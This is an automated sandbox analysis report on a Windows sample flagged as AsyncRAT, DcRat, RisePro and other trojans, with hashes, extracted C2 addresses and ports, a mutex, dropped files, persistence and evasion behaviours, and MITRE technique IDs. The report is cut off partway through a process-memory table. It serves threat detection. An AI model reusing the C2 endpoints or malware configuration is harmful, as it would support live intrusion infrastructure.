asyncrat | 1dfb7d09daa0bece4197d998a72acac7deebaf2ff54b4461667495a41240d0e8

Resubmissions

29-01-2024 12:18

240129-pg3mqsbaap 10

21-01-2024 16:07

240121-tkz38sefc2 10

Analysis

max time kernel
60s
max time network
283s
platform
windows11-21h2_x64
resource
win11-20231215-en
resource tags

arch:x64arch:x86image:win11-20231215-enlocale:en-usos:windows11-21h2-x64system
submitted
21-01-2024 16:07

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

4363463463464363463463463.exe
Size

10KB
MD5

2a94f3960c58c6e70826495f76d00b85
SHA1

e2a1a5641295f5ebf01a37ac1c170ac0814bb71a
SHA256

2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
SHA512

fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f
SSDEEP

192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K

Score

10^/10

asyncrat dcrat risepro sectoprat zgrat default discovery evasion infostealer rat stealer trojan

Malware Config

Extracted

Family

risepro

185.149.146.75:50500

Extracted

Family

asyncrat

Version

1.0.7

Botnet

Default

127.0.0.1:1604

185.169.180.209:1604

Mutex

DcRatMutex_qwqdanchun

Attributes

delay
1
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat

Detect ZGRat V1 4 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Files\hv.exe	family_zgrat_v1
behavioral2/memory/3924-18-0x0000000000190000-0x00000000008C4000-memory.dmp	family_zgrat_v1
C:\Users\Admin\AppData\Local\Temp\Files\hv.exe	family_zgrat_v1
behavioral2/memory/3924-18-0x0000000000190000-0x00000000008C4000-memory.dmp	family_zgrat_v1

Process spawned unexpected child process 64 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

description	pid	pid_target	process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	8848	3720	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4060	3720	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4236	3720	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	8644	3720	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7548	3720	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6680	3720	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7532	3720	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6548	3720	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5376	3720	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7996	3720	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7540	3720	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6628	3720	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6280	3720	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4756	3720	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3436	3720	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	8228	3720	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7372	3720	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7704	3720	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7352	3720	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7328	3720	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	8008	3720	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5336	3720	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6192	3720	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7232	3720	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	8332	3720	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5312	3720	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7772	3720	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7692	3720	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7584	3720	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6780	3720	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6708	3720	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5240	3720	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6332	3720	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7728	3720	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	9024	3720	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6060	3720	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6592	3720	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7508	3720	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	8252	3720	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	8848	3720	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4060	3720	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4236	3720	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	8644	3720	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7548	3720	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6680	3720	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7532	3720	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6548	3720	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5376	3720	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7996	3720	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7540	3720	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6628	3720	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6280	3720	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4756	3720	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3436	3720	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	8228	3720	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7372	3720	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7704	3720	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7352	3720	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7328	3720	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	8008	3720	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5336	3720	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6192	3720	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7232	3720	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	8332	3720	schtasks.exe

RisePro
RisePro stealer is an infostealer distributed by PrivateLoader.
stealer risepro
SectopRAT
SectopRAT is a remote access trojan first seen in November 2019.
trojan rat sectoprat

SectopRAT payload 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/7472-1361-0x0000000000400000-0x00000000004D4000-memory.dmp	family_sectoprat
behavioral2/memory/7472-1361-0x0000000000400000-0x00000000004D4000-memory.dmp	family_sectoprat

ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat

Async RAT payload 4 IoCs

rat

Processes:

resource	yara_rule
behavioral2/memory/5924-662-0x0000000000E80000-0x0000000000E92000-memory.dmp	asyncrat
C:\Users\Admin\AppData\Local\Temp\Files\windows.exe	asyncrat
behavioral2/memory/5924-662-0x0000000000E80000-0x0000000000E92000-memory.dmp	asyncrat
C:\Users\Admin\AppData\Local\Temp\Files\windows.exe	asyncrat

DCRat payload 4 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\ARA.exe	dcrat
C:\Program Files\Microsoft Office 15\ClientX64\RuntimeBroker.exe	dcrat
C:\Users\Admin\AppData\Local\Temp\ARA.exe	dcrat
C:\Program Files\Microsoft Office 15\ClientX64\RuntimeBroker.exe	dcrat

Downloads MZ/PE file
Modifies Windows Firewall 1 TTPs 2 IoCs
evasion

Windows Service
T1543.003

Processes:

netsh.exenetsh.exe

pid process

9136 netsh.exe
9136 netsh.exe

pid	process
9136	netsh.exe
9136	netsh.exe

Executes dropped EXE 22 IoCs

Processes:

hv.exeRiseBuild.exeGorgeousMovement.exeAccommodations.piftuc2.exetuc2.tmpkb%5Efr_ouverture.exeqtsplitcontrolref.exeqtsplitcontrolref.exehack1226.exeWerFault.exehv.exeRiseBuild.exeGorgeousMovement.exeAccommodations.piftuc2.exetuc2.tmpkb%5Efr_ouverture.exeqtsplitcontrolref.exeqtsplitcontrolref.exehack1226.exeWerFault.exe

pid	process
3924	hv.exe
2112	RiseBuild.exe
1536	GorgeousMovement.exe
2680	Accommodations.pif
556	tuc2.exe
648	tuc2.tmp
1484	kb%5Efr_ouverture.exe
416	qtsplitcontrolref.exe
4636	qtsplitcontrolref.exe
1708	hack1226.exe
1828	WerFault.exe
3924	hv.exe
2112	RiseBuild.exe
1536	GorgeousMovement.exe
2680	Accommodations.pif
556	tuc2.exe
648	tuc2.tmp
1484	kb%5Efr_ouverture.exe
416	qtsplitcontrolref.exe
4636	qtsplitcontrolref.exe
1708	hack1226.exe
1828	WerFault.exe

Loads dropped DLL 6 IoCs

Processes:

tuc2.tmptuc2.tmp

pid process

648 tuc2.tmp
648 tuc2.tmp
648 tuc2.tmp
648 tuc2.tmp
648 tuc2.tmp
648 tuc2.tmp
Unexpected DNS network traffic destination 3 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.

Processes:

description ioc

Destination IP 152.89.198.214
Destination IP 91.211.247.248
Destination IP 45.155.250.90
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

pid	process
648	tuc2.tmp
648	tuc2.tmp
648	tuc2.tmp
648	tuc2.tmp
648	tuc2.tmp
648	tuc2.tmp

description	ioc
Destination IP	152.89.198.214
Destination IP	91.211.247.248
Destination IP	45.155.250.90

AutoIT Executable 2 IoCs

AutoIT scripts compiled to PE executables.

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Files\go.exe	autoit_exe
C:\Users\Admin\AppData\Local\Temp\Files\go.exe	autoit_exe

Launches sc.exe 2 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exe

pid process

8548 sc.exe
8548 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

pid	process
8548	sc.exe
8548	sc.exe

Program crash 64 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
1816	1484	WerFault.exe	kb%5Efr_ouverture.exe
8156	3924	WerFault.exe	hv.exe
5084	9048	WerFault.exe	288c47bbc1871b439df19ff4df68f076.exe
8924	9048	WerFault.exe	288c47bbc1871b439df19ff4df68f076.exe
9164	9048	WerFault.exe	288c47bbc1871b439df19ff4df68f076.exe
7996	9048	WerFault.exe	288c47bbc1871b439df19ff4df68f076.exe
8048	9048	WerFault.exe	288c47bbc1871b439df19ff4df68f076.exe
5764	9048	WerFault.exe	288c47bbc1871b439df19ff4df68f076.exe
8656	9048	WerFault.exe	288c47bbc1871b439df19ff4df68f076.exe
8692	9048	WerFault.exe	288c47bbc1871b439df19ff4df68f076.exe
5820	9048	WerFault.exe	288c47bbc1871b439df19ff4df68f076.exe
8324	9048	WerFault.exe	288c47bbc1871b439df19ff4df68f076.exe
4324	9048	WerFault.exe	288c47bbc1871b439df19ff4df68f076.exe
8256	9048	WerFault.exe	288c47bbc1871b439df19ff4df68f076.exe
4680	9048	WerFault.exe	288c47bbc1871b439df19ff4df68f076.exe
7908	9048	WerFault.exe	288c47bbc1871b439df19ff4df68f076.exe
8796	9048	WerFault.exe	288c47bbc1871b439df19ff4df68f076.exe
1084	9048	WerFault.exe	288c47bbc1871b439df19ff4df68f076.exe
8616	9048	WerFault.exe	288c47bbc1871b439df19ff4df68f076.exe
8704	9048	WerFault.exe	288c47bbc1871b439df19ff4df68f076.exe
8264	9048	WerFault.exe	288c47bbc1871b439df19ff4df68f076.exe
5856	4820	WerFault.exe	288c47bbc1871b439df19ff4df68f076.exe
7080	4820	WerFault.exe	288c47bbc1871b439df19ff4df68f076.exe
6496	4820	WerFault.exe	288c47bbc1871b439df19ff4df68f076.exe
7212	4820	WerFault.exe	288c47bbc1871b439df19ff4df68f076.exe
7224	4820	WerFault.exe	288c47bbc1871b439df19ff4df68f076.exe
9064	4820	WerFault.exe	288c47bbc1871b439df19ff4df68f076.exe
8420	4820	WerFault.exe	288c47bbc1871b439df19ff4df68f076.exe
8932	4820	WerFault.exe	288c47bbc1871b439df19ff4df68f076.exe
8900	4820	WerFault.exe	288c47bbc1871b439df19ff4df68f076.exe
6416	5588	WerFault.exe	csrss.exe
7380	5588	WerFault.exe	csrss.exe
6908	5588	WerFault.exe	csrss.exe
6952	5588	WerFault.exe	csrss.exe
6604	5588	WerFault.exe	csrss.exe
6644	5588	WerFault.exe	csrss.exe
6276	5588	WerFault.exe	csrss.exe
6508	5588	WerFault.exe	csrss.exe
5820	5588	WerFault.exe	csrss.exe
8892	5588	WerFault.exe	csrss.exe
840	5588	WerFault.exe	csrss.exe
6772	5588	WerFault.exe	csrss.exe
7548	5588	WerFault.exe	csrss.exe
5800	5588	WerFault.exe	csrss.exe
1816	1484	WerFault.exe	kb%5Efr_ouverture.exe
8156	3924	WerFault.exe	hv.exe
5084	9048	WerFault.exe	288c47bbc1871b439df19ff4df68f076.exe
8924	9048	WerFault.exe	288c47bbc1871b439df19ff4df68f076.exe
9164	9048	WerFault.exe	288c47bbc1871b439df19ff4df68f076.exe
7996	9048	WerFault.exe	288c47bbc1871b439df19ff4df68f076.exe
8048	9048	WerFault.exe	288c47bbc1871b439df19ff4df68f076.exe
5764	9048	WerFault.exe	288c47bbc1871b439df19ff4df68f076.exe
8656	9048	WerFault.exe	288c47bbc1871b439df19ff4df68f076.exe
8692	9048	WerFault.exe	288c47bbc1871b439df19ff4df68f076.exe
5820	9048	WerFault.exe	288c47bbc1871b439df19ff4df68f076.exe
8324	9048	WerFault.exe	288c47bbc1871b439df19ff4df68f076.exe
4324	9048	WerFault.exe	288c47bbc1871b439df19ff4df68f076.exe
8256	9048	WerFault.exe	288c47bbc1871b439df19ff4df68f076.exe
4680	9048	WerFault.exe	288c47bbc1871b439df19ff4df68f076.exe
7908	9048	WerFault.exe	288c47bbc1871b439df19ff4df68f076.exe
8796	9048	WerFault.exe	288c47bbc1871b439df19ff4df68f076.exe
1084	9048	WerFault.exe	288c47bbc1871b439df19ff4df68f076.exe
8616	9048	WerFault.exe	288c47bbc1871b439df19ff4df68f076.exe
8704	9048	WerFault.exe	288c47bbc1871b439df19ff4df68f076.exe

Creates scheduled task(s) 1 TTPs 64 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

Processes:

pid	process
7584	schtasks.exe
5240	schtasks.exe
8252	schtasks.exe
7548	schtasks.exe
6708	schtasks.exe
7328	schtasks.exe
6192	schtasks.exe
7352	schtasks.exe
7548	schtasks.exe
7352	schtasks.exe
9024	schtasks.exe
4060	schtasks.exe
5376	schtasks.exe
6628	schtasks.exe
8848	schtasks.exe
8228	schtasks.exe
8892	schtasks.exe
7692	schtasks.exe
8848	schtasks.exe
8008	schtasks.exe
7584	schtasks.exe
5376	schtasks.exe
6280	schtasks.exe
7508	schtasks.exe
8228	schtasks.exe
6780	schtasks.exe
6592	schtasks.exe
8644	schtasks.exe
6780	schtasks.exe
6708	schtasks.exe
4756	schtasks.exe
5336	schtasks.exe
6628	schtasks.exe
6332	schtasks.exe
6592	schtasks.exe
6548	schtasks.exe
7372	schtasks.exe
8332	schtasks.exe
5312	schtasks.exe
7728	schtasks.exe
6548	schtasks.exe
5336	schtasks.exe
8332	schtasks.exe
5312	schtasks.exe
7996	schtasks.exe
7704	schtasks.exe
7232	schtasks.exe
8252	schtasks.exe
6548	schtasks.exe
8008	schtasks.exe
7772	schtasks.exe
7532	schtasks.exe
5240	schtasks.exe
4236	schtasks.exe
4756	schtasks.exe
6192	schtasks.exe
7728	schtasks.exe
7880	schtasks.exe
7328	schtasks.exe
8892	schtasks.exe
7532	schtasks.exe
7540	schtasks.exe
7768	schtasks.exe
6280	schtasks.exe

Enumerates processes with tasklist 1 TTPs 4 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exetasklist.exetasklist.exe

pid process

1992 tasklist.exe
4052 tasklist.exe
1992 tasklist.exe
4052 tasklist.exe
Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

9016 taskkill.exe
9016 taskkill.exe

pid	process
1992	tasklist.exe
4052	tasklist.exe
1992	tasklist.exe
4052	tasklist.exe

pid	process
9016	taskkill.exe
9016	taskkill.exe

Modifies system certificate store 2 TTPs 4 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

Processes:

4363463463464363463463463.exe4363463463464363463463463.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 0f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b1400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba953030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f	4363463463464363463463463.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD	4363463463464363463463463.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 0f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b1400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba953030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f	4363463463464363463463463.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD	4363463463464363463463463.exe

Runs net.exe
Runs ping.exe 1 TTPs 4 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXEPING.EXEPING.EXE

pid process

1404 PING.EXE
7356 PING.EXE
1404 PING.EXE
7356 PING.EXE

pid	process
1404	PING.EXE
7356	PING.EXE
1404	PING.EXE
7356	PING.EXE

Suspicious behavior: EnumeratesProcesses 20 IoCs

Processes:

Accommodations.piftuc2.tmpAccommodations.piftuc2.tmp

pid	process
2680	Accommodations.pif
2680	Accommodations.pif
2680	Accommodations.pif
2680	Accommodations.pif
2680	Accommodations.pif
2680	Accommodations.pif
2680	Accommodations.pif
2680	Accommodations.pif
648	tuc2.tmp
648	tuc2.tmp
2680	Accommodations.pif
2680	Accommodations.pif
2680	Accommodations.pif
2680	Accommodations.pif
2680	Accommodations.pif
2680	Accommodations.pif
2680	Accommodations.pif
2680	Accommodations.pif
648	tuc2.tmp
648	tuc2.tmp

Suspicious use of AdjustPrivilegeToken 10 IoCs

Processes:

4363463463464363463463463.exetasklist.exetasklist.exeAUDIODG.EXE4363463463464363463463463.exetasklist.exetasklist.exeAUDIODG.EXE

description	pid	process
Token: SeDebugPrivilege	1164	4363463463464363463463463.exe
Token: SeDebugPrivilege	1992	tasklist.exe
Token: SeDebugPrivilege	4052	tasklist.exe
Token: 33	3560	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	3560	AUDIODG.EXE
Token: SeDebugPrivilege	1164	4363463463464363463463463.exe
Token: SeDebugPrivilege	1992	tasklist.exe
Token: SeDebugPrivilege	4052	tasklist.exe
Token: 33	3560	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	3560	AUDIODG.EXE

Suspicious use of FindShellTrayWindow 12 IoCs

Processes:

Accommodations.piftuc2.tmpWerFault.exeAccommodations.piftuc2.tmpWerFault.exe

pid	process
2680	Accommodations.pif
2680	Accommodations.pif
2680	Accommodations.pif
648	tuc2.tmp
1828	WerFault.exe
1828	WerFault.exe
2680	Accommodations.pif
2680	Accommodations.pif
2680	Accommodations.pif
648	tuc2.tmp
1828	WerFault.exe
1828	WerFault.exe

Suspicious use of SendNotifyMessage 10 IoCs

Processes:

Accommodations.pifWerFault.exeAccommodations.pifWerFault.exe

pid	process
2680	Accommodations.pif
2680	Accommodations.pif
2680	Accommodations.pif
1828	WerFault.exe
1828	WerFault.exe
2680	Accommodations.pif
2680	Accommodations.pif
2680	Accommodations.pif
1828	WerFault.exe
1828	WerFault.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

4363463463464363463463463.exeGorgeousMovement.execmd.execmd.exetuc2.exetuc2.tmp

description	pid	process	target process
PID 1164 wrote to memory of 3924	1164	4363463463464363463463463.exe	hv.exe
